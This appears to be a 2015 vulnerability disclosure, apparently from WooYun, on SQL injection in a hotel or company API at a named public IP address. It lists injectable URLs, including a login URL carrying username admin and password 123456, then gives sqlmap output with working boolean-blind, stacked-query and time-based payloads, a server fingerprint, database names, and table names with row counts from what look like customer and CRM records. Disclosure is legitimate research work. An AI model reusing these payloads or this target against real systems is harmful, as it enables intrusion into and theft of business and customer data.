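2015-07-07: Details reported to the vendor; awaiting vendor handling.
2015-07-12: The vendor actively ignored the vulnerability; details disclosed to the public.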
1. http://220.196.57.147:8080/GetUser.aspx?password=123456&service=api_company_login&username=admin
2. http://220.196.57.147:8080/GetUnit.aspx?BeginDate=2015-06-20&City=3100&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist
   (almost every parameter in here is injectable)
3. http://220.196.57.147:8080/GetResv.aspx?endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-01
4. http://220.196.57.147:8080/GetUnit.aspx?RmtpId=1&service=api_getUnitRmtp&UnitId=0001
sqlmap identified the following injection points with a total of 84 HTTP(s) requests:
---
Parameter: startDate (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-01' AND 7092=7092 AND 'xqfP'='xqfP
---

sqlmap identified the following injection points with a total of 109 HTTP(s) requests:
---
Parameter: username (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: password=123456&service=api_company_login&username=-3213' OR 4831=4831 AND 'nAZu'='nAZu

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: password=123456&service=api_company_login&username=admin';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: password=123456&service=api_company_login&username=admin' AND 4493=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'jrjq'='jrjq
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008

sqlmap identified the following injection points with a total of 1349 HTTP(s) requests:
---
Parameter: City (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BeginDate=2015-06-20&City=3100' AND 2004=2004 AND 'CMOs'='CMOs&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: BeginDate=2015-06-20&City=3100';WAITFOR DELAY '0:0:5'--&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008

available databases [8]:
[*] CenterDB
[*] CenterDB_History
[*] distribution
[*] ERM
[*] master
[*] model
[*] msdb
[*] tempdb

Database: ERM
[169 tables]

Database: ERM
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.CRM_JianYeShuTongJiLiuShui       | 842324  |
| dbo.V_CRM_JianYeShuTongJiLiuShui     | 842324  |
| dbo.V_CRM_XiaoShouYuanGongXianDetail | 842324  |
| dbo.BaseLog                          | 148882  |
| dbo.CRM_JianYeShuTongJi              | 141136  |
| dbo.CRM_BusinessLog                  | 94733   |
| dbo.CRM_BusinessLogDetials           | 88870   |
| dbo.Z_National                       | 41480   |
| dbo.Z_Contract                       | 41321   |
| dbo.Z_CRM_QiYeKeHuXieYi              | 41173   |
| dbo.Z_CRM_QiYeKeHuXinXi              | 40983   |
| dbo.BaseParameter                    | 36444   |
| dbo.CRM_PMSIssuedLog                 | 11292   |

[18:21:19] [INFO] fetching tables for database: CenterDB
[18:21:19] [INFO] fetching number of tables for database 'CenterDB'
[18:21:20] [INFO] resumed: 522
...
Severity: No impact, ignored by vendor
Ignored at: 2015-07-12 12:12
Vulnerability Rank: 15 (WooYun rating)
None yet